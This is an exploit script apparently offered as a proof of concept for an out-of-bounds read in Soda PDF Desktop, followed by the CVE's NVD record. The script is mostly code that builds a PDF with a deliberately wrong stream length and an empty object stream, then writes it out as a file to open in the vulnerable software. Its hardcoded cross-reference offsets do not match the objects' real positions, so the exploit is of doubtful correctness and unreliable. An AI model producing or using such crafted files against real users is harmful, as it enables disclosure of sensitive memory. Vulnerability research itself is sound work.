CVE-2025-14411

#!/usr/bin/env python3 """ CVE-2025-14411 PoC - Soda PDF Desktop PDF Parsing Out-Of-Bounds Read Note: This PoC is for educational and security research purposes only. """ import struct import sys def create_malicious_pdf(): """Generate a malicious PDF file that triggers OOB read""" # PDF header pdf_content = b'%PDF-1.7\n' pdf_content += b'%\xe2\xe3\xcf\xd3\n' # Object 1: Catalog pdf_content += b'1 0 obj\n' pdf_content += b'<< /Type /Catalog /Pages 2 0 R >>\n' pdf_content += b'endobj\n' # Object 2: Pages pdf_content += b'2 0 obj\n' pdf_content += b'<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n' pdf_content += b'endobj\n' # Object 3: Page with crafted stream that triggers OOB read pdf_content += b'3 0 obj\n' pdf_content += b'<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\n' pdf_content += b'endobj\n' # Object 4: Malicious content stream with crafted length # The stream length is manipulated to trigger OOB read during parsing stream_data = b'\x00' * 100 # Padding data pdf_content += b'4 0 obj\n' pdf_content += b'<< /Length ' + str(len(stream_data) + 0x1000).encode() + b' /Filter /FlateDecode >>\n' pdf_content += b'stream\n' pdf_content += stream_data pdf_content += b'\nendstream\n' pdf_content += b'endobj\n' # Object 5: Additional crafted object that may trigger OOB pdf_content += b'5 0 obj\n' pdf_content += b'<< /Type /ObjStm /N 10 /First 0 /Length 0 >>\n' pdf_content += b'stream\n' pdf_content += b'endstream\n' pdf_content += b'endobj\n' # Cross-reference table xref_offset = len(pdf_content) pdf_content += b'xref\n' pdf_content += b'0 6\n' pdf_content += b'0000000000 65535 f \n' pdf_content += b'0000000009 00000 n \n' pdf_content += b'0000000058 00000 n \n' pdf_content += b'0000000115 00000 n \n' pdf_content += b'0000000200 00000 n \n' pdf_content += b'0000000300 00000 n \n' # Trailer pdf_content += b'trailer\n' pdf_content += b'<< /Size 6 /Root 1 0 R >>\n' pdf_content += b'startxref\n' pdf_content += str(xref_offset).encode() + b'\n' pdf_content += b'%%EOF\n' return pdf_content if __name__ == '__main__': print('[+] Generating PoC for CVE-2025-14411') print('[+] Target: Soda PDF Desktop') print('[+] Vulnerability: Out-Of-Bounds Read in PDF parsing') pdf_data = create_malicious_pdf() output_file = 'CVE-2025-14411_poc.pdf' with open(output_file, 'wb') as f: f.write(pdf_data) print(f'[+] PoC file created: {output_file}') print('[+] Size:', len(pdf_data), 'bytes') print('[!] Note: This PoC triggers OOB read conditions in PDF parser')

{"cve": {"id": "CVE-2025-14411", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.877", "lastModified": "2026-01-21T20:34:08.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27140."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1084/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}